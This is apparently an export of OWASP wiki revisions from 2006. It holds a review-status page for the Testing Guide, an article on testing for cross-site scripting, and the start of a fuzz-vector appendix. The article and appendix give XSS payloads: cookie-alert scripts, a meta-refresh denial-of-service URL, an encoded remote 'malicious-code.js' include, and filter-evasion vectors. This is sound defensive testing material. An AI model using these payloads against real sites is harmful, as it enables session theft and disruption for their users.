** 4.5.2 Cookie and Session token Manipulation (100%) (daniel reviewing)&lt;br /&gt;
** 4.5.3 Exposed session variables (90%-&amp;gt;100%) (daniel reviewing)&lt;br /&gt;
** 4.5.4 Session Riding (XSRF) (80%-&amp;gt;100%) (daniel reviewing)&lt;br /&gt;
** 4.5.5 HTTP Exploit (0%) (daniel reviewing)&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''4.6 Data Validation Testing --&amp;gt; Meucci'''&lt;br /&gt;
18 articles reviewed (3 are at 0%)&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.6 Data Validation Testing : Reviewed by EK&lt;br /&gt;
*** (Bregolin) begin&lt;br /&gt;
*** [Note: Haven't committed the following since that would imply a substantial rewrite, let's see what others think]&lt;br /&gt;
*** I think that this section should first categorize what constitutes input for a web application. (Which allows to identify what must be tested, and how). i.e., obviously input fields, hidden fields, HTTP headers (such as Referer, cookies), HTTP methods etc.&lt;br /&gt;
*** There are other kinds of injection, such as CRLF injection.&lt;br /&gt;
*** SQL Injection affects SQL statements, and not queries (though usually that's the case)&lt;br /&gt;
*** It should be stressed that the main reason to perform data validation is to prevent application faults, i.e. unexpected behavior, that is violation of (security) requirements. Regardless of the categories of vulnerabilities listed, an application should (actually must!) verify all input against: type, length, range or domain validity. &amp;quot;Bad&amp;quot; input may not cause any of the listed vulnerabilities yet cause the application to misbehave, if it is not checked (possibly causing DoS or violating data integrity or confidentiality).&lt;br /&gt;
*** (Bregolin) end&lt;br /&gt;
** 4.6.1 Cross site scripting: Reviewed by EK (Reformatted it slightly with wiki tags). '''Not completed'''&lt;br /&gt;
*** Reviewed by SDP. Some thought about content structure: &lt;br /&gt;
***:As it is a testing guide, any other information about how to sanitize input should be referenced to Owasp Data Validation Project (no redundancy). Approach in testing section could be more schematic.&lt;br /&gt;
***:A kind of:&lt;br /&gt;
**** Special characters entities etc.&lt;br /&gt;
**** Context Dependent characters (an intro)&lt;br /&gt;
**** How to search for Reflected, stored and DOM vulnerabilities.&lt;br /&gt;
**** Non obvious injections (Administrative pages or non obvious pages) and second order injections (at least a small intro and/or a whitepaper/reference to incubated flaws).&lt;br /&gt;
** 4.6.1.1 HTTP Methods and XST Reviewed by MM. Reviewed by AP.&lt;br /&gt;
** 4.6.2 SQL Injection (90%-&amp;gt;100%) Reviewed by MM. Reviewed by EK.&lt;br /&gt;
*** Not sure about &amp;quot;inferential&amp;quot; injection definition in &amp;quot;Description of Issue&amp;quot;&lt;br /&gt;
*** Added some reference to Oracle. Corrected English.&lt;br /&gt;
** 4.6.2.1 Stored procedure injection (40%) '''TD (not enough informations)'''&lt;br /&gt;
**4.6.2.2 Oracle testing (0%) '''TD (not enough informations)'''&lt;br /&gt;
** 4.6.2.3 MySQL testing (100%) Reviewed by MM&lt;br /&gt;
** 4.6.2.4 SQL Server testing (95%) Reviewed by MM. Reviewed by AR.&lt;br /&gt;
** 4.6.3 LDAP Injection (90%) Reviewed by MM added wp and tools&lt;br /&gt;
** 4.6.4 ORM Injection (100%) '''TD (not enough informations)'''&lt;br /&gt;
** 4.6.5 XML Injection (90%) Reviwed and updated by MM. '''WP and tools?'''&lt;br /&gt;
** 4.6.6 SSI Injection (95%-&amp;gt;100%) Reviewed by MM &lt;br /&gt;
** 4.6.7 XPath Injection (80%) Reviewed by MM. '''Gray box section is to complete?'''&lt;br /&gt;
** 4.6.8 IMAP/SMTP Injection (95%-&amp;gt;100%)Reviewed by MM &lt;br /&gt;
** 4.6.9 Code Injection (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.10 OS Commanding (70%) Reviewed by MM + added an example. '''Not completed'''&lt;br /&gt;
** 4.6.11 Buffer overflow Testing (100%) Reviewed by MM. '''Note: these tests are not usual web app tests'''&lt;br /&gt;
*** (Bregolin) The point is that these are not black box tests, so where they are now they are misplaced&lt;br /&gt;
** 4.6.11.1 Heap overflow (100%) Reviewed by MM&lt;br /&gt;
** 4.6.11.2 Stack overflow (100%)Reviewed by MM&lt;br /&gt;
** 4.6.11.3 Format string (100%)Reviewed by MM&lt;br /&gt;
** 4.6.12 Incubated vulnerability testing (95%) Reviewed by MM, whitepapers?&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''4.7 Denial of Service Testing--&amp;gt; Revelli'''&lt;br /&gt;
8 of 8 articles Reviewed&lt;br /&gt;
'''[OK] - To do the References'''&lt;br /&gt;
** 4.7 Denial of Service Testing 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.1 Locking Customer Accounts 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.2 Buffer Overflows 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.3 User Specified Object Allocation 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.4 User Input as a Loop Counter 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.5 Writing User Provided Data to Disk 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.6 Failure to Release Resources 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.7 Storing too Much Data in Session 100% Reviewd by Revelli&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''4.8 Web Services Testing --&amp;gt; Matteo Meucci'''&lt;br /&gt;
6 of 6 articles reviewed&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.8 Web Services Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.1 XML Structural Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.2 XML content-level Testing (90%-&amp;gt;100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.3 HTTP GET parameters/REST Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.4 Naughty SOAP attachments (95%-&amp;gt;100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.5 Replay Testing (95%-&amp;gt;100%) Reviewed by Meucci. &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''4.9 AJAX Testing --&amp;gt; Roxberry'''&lt;br /&gt;
3 of 3 articles to be reviewed &lt;br /&gt;
** 4.9 AJAX Testing (70%)&lt;br /&gt;
** 4.9.1 Vulnerabilities (60%)&lt;br /&gt;
** 4.9.2 How to test (60%)&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''5. Writing Reports: value the real risk'''&lt;br /&gt;
We have to write about it. I consider it not yet finished.&lt;br /&gt;
O of 3 articles to be reviewed.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''Appendix A: Testing Tools --&amp;gt;Review and updated by Meucci'''&lt;br /&gt;
0 article of 1: need a paragraph to describe each OWASP tool&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''Appendix B: Suggested Reading --&amp;gt;...'''&lt;br /&gt;
1 article of 1: need to update it &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''Appendix C: Fuzz Vectors --&amp;gt; Stefano Di Paola, Subere '''&lt;br /&gt;
ok. Some other fuzz vectors could be added. &amp;lt;br&amp;gt;&lt;br /&gt;
How about every author to add his specific fuzz vector section?&amp;lt;br&amp;gt;&lt;br /&gt;
Example: &lt;br /&gt;
 &lt;br /&gt;
LDAP Injection: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*)(|%26&amp;lt;br&amp;gt;&lt;br /&gt;
... &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Reviewers  Rules &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1) Check the english language&amp;lt;br&amp;gt;&lt;br /&gt;
2) Check the template: the articles on chapter 4 should have the following:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Template (http://www.owasp.org/index.php/Template_Paragraph_Testing_AoC)&lt;br /&gt;
&lt;br /&gt;
In some articles we don't need to talk about Gray Box Testing or other, so we can eliminate it.&lt;br /&gt;
&lt;br /&gt;
3) Check the reference style. (I'd like to have all the referenced URLs visible because I have to produce also a pdf document of the Guide).&lt;br /&gt;
I agree with Stefano, we have to use a reference like that:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;== References ==&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Whitepapers'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [1] Author1, Author2: &amp;quot;Title&amp;quot; - http://www.ietf.org/rfc/rfc2254.txt&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [2]...&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Tools'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* Francois Larouche: &amp;quot;Multiple DBMS Sql Injection tool&amp;quot; - http://www.sqlpowerinjector.com/index.htm &amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4) Check the reference with the other articles of the guide or with the other OWASP Project.&lt;br /&gt;
&lt;br /&gt;
5) Other?&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&amp;diff=13696</id>
		<title>Testing for Cross site scripting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&amp;diff=13696"/>
				<updated>2006-11-26T12:57:29Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Description of the Issue */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
Cross Site Scripting is one of the most common application level attacks. Many times people will look at a Cross Site Scripting (also known as XSS, CSS was avoided not to confuse people with Cascade Styling Sheets) attack and say WOW you made a JavaScript popup window, but how does this effect me?&lt;br /&gt;
&lt;br /&gt;
Cross Site Scripting vulnerabilities are essentially code injection attacks. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases Cross Site Scripting vulnerabilities can even perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.&lt;br /&gt;
&lt;br /&gt;
Furthermore, we will provide more detailed information about the three types of Cross Site Scripting vulnerabilities, DOM-Based, Stored and Reflected.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue ==&lt;br /&gt;
&lt;br /&gt;
Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site. The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site –specifically, impersonate the user. - Identity theft!&lt;br /&gt;
&lt;br /&gt;
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross-Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide-range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the &amp;lt;Script&amp;gt; tag. Typically, XSS attacks involve malicious JavaScript, but it can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.&lt;br /&gt;
Cross site scripting is used in many Phishing attacks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The '''DOM-based Cross-Site Scripting''' problem exists within a page's client-side script itself. If the JavaScript accesses a URL request parameter (an example would be an RSS feed) and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS vulnerability will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side script.&lt;br /&gt;
Exploiting such a hole would be very similar to the exploit of Reflected XSS vulnerabilities , except in one very important situation. &lt;br /&gt;
&lt;br /&gt;
An example would be, if an attacker hosts a malicious website, which contains a link to a vulnerable page on a client's local system, a script could be injected and would run with privileges of that user's browser on their system. This bypasses the entire client-side sandbox, not just the cross-domain restrictions that are normally bypassed with XSS exploits.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The '''Reflected Cross-Site Scripting''' vulnerability is by far the most common and well know type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.&lt;br /&gt;
&lt;br /&gt;
At first glance, this does not appear to be a serious problem since users can only inject code into their own pages. However, with a small amount of social engineering, an attacker could convince a user to follow a malicious URL which injects code into the results page, giving the attacker full access to that page's content. Due to the general requirement of the use of some social engineering in this case (and normally in DOM-Based XSS vulnerabilities as well), many programmers have disregarded these holes as not terribly important. This misconception is sometimes applied to XSS holes in general (even though this is only one type of XSS) and there is often disagreement in the security community as to the importance of cross-site scripting vulnerabilities. The simplest way to show the importance of a XSS vulnerability would be to perform a Denial of Service attack.&lt;br /&gt;
In some cases a denial of service attack can be performed on the server by doing the Following:      &lt;br /&gt;
article.php?title=&amp;lt;meta%20http-equiv=&amp;quot;refresh&amp;quot;%20content=&amp;quot;0;&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This makes a refresh request roughly about every .3 seconds to particular page. It then acts like an infinite loop of refresh requests potentially bringing down the web and database server by flooding it with requests. The more browser sessions that are open, the more intense the attack becomes. &lt;br /&gt;
&lt;br /&gt;
The '''Stored Cross Site Scripting''' vulnerability, is the most powerful kinds of  XSS attacks. A Stored XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entities. A real life example of this would be SAMY, the XSS vulnerability found on MySpace in October of 2005.&lt;br /&gt;
These vulnerabilities are more significant than other types because an attacker can inject the script just once. This could potentially hit a large number of other users with little need for social engineering or the web application could even be infected by a cross-site scripting virus.&lt;br /&gt;
&lt;br /&gt;
The methods of injection can vary a great deal. A perfect example of how this type of an attack could impact an organization, instead of an individual, was demonstrated by Jeremiah Grossman @ BlackHat USA 2006. The demonstration gave an example of how if you posted a stored XSS script to a popular blog, newspaper or page comments section of a website, all the visitors of that page would have their internal networks scanned and logged for a particular type of vulnerability.&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''/testcgi.exe?&amp;lt;SCRIPT&amp;gt;alert(“Cookie”+document.cookie)&amp;lt;/SCRIPT&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.&lt;br /&gt;
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult. Consider implementing the following recommendations if one or more XSS vulnerabilities have been detected in your application&lt;br /&gt;
&lt;br /&gt;
The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. This is a complex problem area so there is no one simple fix or solution:&lt;br /&gt;
* Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form.&lt;br /&gt;
* Ensure that any executables on your server do not return scripts in executable form when passed scripts as malformed command parameters.&lt;br /&gt;
* Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “&amp;lt;” to “&amp;amp;lt;&amp;gt;.&lt;br /&gt;
* If your site runs online forums or message boards, disallow the use of HTML tags and Scripting in these areas.&lt;br /&gt;
* Keep up with the latest security vulnerabilities and bugs for all production applications and servers.&lt;br /&gt;
* Update your production servers with the latest XSS vulnerabilities by downloading current patches, and perform frequent security audits on all deployed applications.&lt;br /&gt;
The root cause of Cross-Site Scripting is a failure to filter hazardous characters from web application input and output. The two most critical programming practices you can institute to guard against Cross-Site Scripting are:&lt;br /&gt;
* Validate Input&lt;br /&gt;
* Encode output&lt;br /&gt;
Always filter data originating from outside your application by disallowing the use of special characters. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that validate user input against a set of allowed, safe characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security and makes it harder to bypass input validation routines.&lt;br /&gt;
There are different tools you can use to validate and encode your data, depending upon your development environment. Your goal in remediating Cross-Site Scripting attacks is to filter and encode all potentially dangerous characters so that the application does not return data that the browser will interpret as executable.  Any unescaped or unecoded data that is returned to the browser is a potential security risk.&lt;br /&gt;
The following characters can be harmful and should be filtered whenever they appear in the application input or output. In output, you should translate these characters to their HTML equivalents before returning data to the browser.&amp;lt;BR&amp;gt;&lt;br /&gt;
'''&amp;gt;     &amp;lt;   (     )     [     ]     '     &amp;quot;     ;     :     /     |'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;PHP&amp;lt;/b&amp;gt;&lt;br /&gt;
The following PHP functions help mitigate Cross-Site Scripting Vulnerabilities:&lt;br /&gt;
* '''Strip_tags()''' removes HTML and PHP scripting tags from a string.&lt;br /&gt;
* '''Utf8_decode()''' converts UTF-8 encoding to single byte ASCII characters. Decoding Unicode input prior to filtering it can help you detect attacks that the attacker has obfuscated with Unicode encoding.&lt;br /&gt;
* '''Htmlspecialcharacters()''' turns characters such as '''&amp;amp;,&amp;gt;,&amp;lt;,”''' into their HTML equivalents. Converting special characters to HTML prevents them from being executed within browsers when outputted by an application.&lt;br /&gt;
* '''Strtr()''' filters any characters you specify. Make sure to filter  “; : ( )” characters so that attackers cannot craft strings that generate alerts. Many XSS attacks are possible without the use of HTML characters, so filtering and encoding parentheses mitigates these attacks.&amp;lt;BR&amp;gt;For example:&lt;br /&gt;
'''&amp;quot; style=&amp;quot;background:url(JavaScript:alert(Malicious Content));'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;ASP.NET&amp;lt;/b&amp;gt;&lt;br /&gt;
With ASP.NET, you can use the following functions to help prevent Cross-Site Scripting:&lt;br /&gt;
* Constrain input submitted via server controls by using ASP.NET validater controls, such as '''RegularExpressionValidator''', '''RangeValidator''', and '''System.Text.RegularExpression.Regex'''. Using these methods as server-side controls to limit data input to only allowable character sequences by validating input type, length, format, and character range.&lt;br /&gt;
* Use the '''HtmlUtility.HtmlEncode''' method to encode data if it originates from either a user or from a database. HtmlEncode replaces special characters with their HTML equivalents, thus preventing the output from being executable in the browser. Use HtmlUtility.UrlEncode when writing URLs that may have originated from user input or stored database information.&lt;br /&gt;
* Use the '''HttpOnly cookie''' option for added protection.&lt;br /&gt;
* As a best practice, you should use regular expressions to constrain input to known safe characters. Do not rely solely on ASP.NET validateRequest, but use it in addition to your other input validation and encoding mechanisms.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example ==&lt;br /&gt;
When you know certain types of countermeasures have been applied to code, you may want to try some tactics like this:&lt;br /&gt;
&lt;br /&gt;
''Example 1:''&lt;br /&gt;
&lt;br /&gt;
Since JavaScript is case sensitive, some people attempt to filter XSS by converting all characters to upper case thinking render Cross Site Scripting useless. If this is the case, you may want to use VBScript since it is not a case sensative language.&lt;br /&gt;
&lt;br /&gt;
JavaScript: &amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
VBScript: &amp;lt;script type=&amp;quot;text/vbscript&amp;quot;&amp;gt;alert(DOCUMENT.COOKIE)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Example 2:''&lt;br /&gt;
&lt;br /&gt;
If they are filtering for the &amp;lt; or the open of &amp;lt;script or closing of script&amp;gt; you should try various methods of encoding:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;script src=http://www.owasp.org/malicious-code.js&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
%3cscript src=http://www.owasp.org/malicious-code.js%3e%3c/script%3e&lt;br /&gt;
&lt;br /&gt;
\x3cscript src=http://www.owasp.org/malicious-code.js\x3e\x3c/script\x3e&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Paul Lindner: &amp;quot;Preventing Cross-site Scripting Attacks&amp;quot; - http://www.perl.com/pub/a/2002/02/20/css.html&lt;br /&gt;
&lt;br /&gt;
* CERT: &amp;quot;CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests&amp;quot; - http://www.cert.org/advisories/CA-2000-02.html&lt;br /&gt;
&lt;br /&gt;
* RSnake: &amp;quot;XSS (Cross Site Scripting) Cheat Sheet&amp;quot; - http://ha.ckers.org/xss.html&lt;br /&gt;
&lt;br /&gt;
* Amit Klien: &amp;quot;DOM Based Cross Site Scripting&amp;quot; - http://www.securiteam.com/securityreviews/5MP080KGKW.html&lt;br /&gt;
&lt;br /&gt;
* Jeremiah Grossman: &amp;quot;Hacking Intranet Websites from the Outside &amp;quot;JavaScript malware just got a lot more dangerous&amp;quot;&amp;quot; - http://www.blackhat.com/presentations/bh-jp-06/BH-JP-06-Grossman.pdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project&amp;lt;br&amp;gt;&lt;br /&gt;
** CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13695</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13695"/>
				<updated>2006-11-26T11:50:13Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Replasive fuzzing */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replasive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replasive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
